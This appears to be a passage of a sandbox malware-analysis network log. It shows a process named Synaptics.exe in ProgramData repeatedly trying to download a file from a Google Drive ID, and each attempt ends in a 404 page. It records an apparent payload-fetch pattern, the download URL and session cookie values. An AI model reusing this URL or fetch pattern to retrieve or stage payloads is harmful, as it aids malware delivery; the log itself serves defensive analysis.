                                                                                                                                                                                    2024-12-30 10:51:51 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:51 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-MW3Bh8Dhr5RjQmUZh_M0UA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    44192.168.2.451932142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:51 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:51 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--TjqQ0El3TnxlGw8oVNNow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    45192.168.2.451929142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:51 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:51 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7LnRG-HYU-_3OXlcAea6-9Vk-qkv6grYhQUNzmHiESHvOhh7Pz_0HOS_AYZeOnoIVLOD0wS_4
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:51 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-w4UTtfF_OFlSSuzOegukeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:51 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:51 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 45 53 4d 57 48 4f 38 30 46 47 41 6b 4f 76 78 2d 78 76 30 5f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="rESMWHO80FGAkOvx-xv0_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:51 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    46192.168.2.451944142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:52 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:52 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-sELj27GhSp9wACGc-hUufQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    47192.168.2.451942142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:52 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:52 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5OpGdbt2-KFy2G03WtJMpr4YbciZ26dtb1aIC9ncHJdBCPmuly7rf1X1gNgoPeHalMDrc4gVE
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:52 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-QgMhFOMmq5bjXQb7-riXCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:52 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:52 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 6e 43 35 4f 75 41 45 79 36 43 47 64 53 62 59 62 33 5a 47 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="WnC5OuAEy6CGdSbYb3ZGAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:51:52 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    48192.168.2.451943142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:52 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:52 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-BZ-9uSsN1XDDNhq0RjclSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    49192.168.2.451945142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:52 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:51:53 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6FvQeD8DIlMjcme3uZzqJ27QFk7XFpJng9PVm9o3QNPEzfZniSkgqCXE5W_AEcG2EFJINMTMg
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:52 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-6W3gxUhtAqdp3Z1-PDcXCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:53 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:51:53 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 42 32 34 31 53 5a 38 5f 64 70 45 67 56 69 56 48 41 5f 49 6c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="2B241SZ8_dpEgViVHA_Ilg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
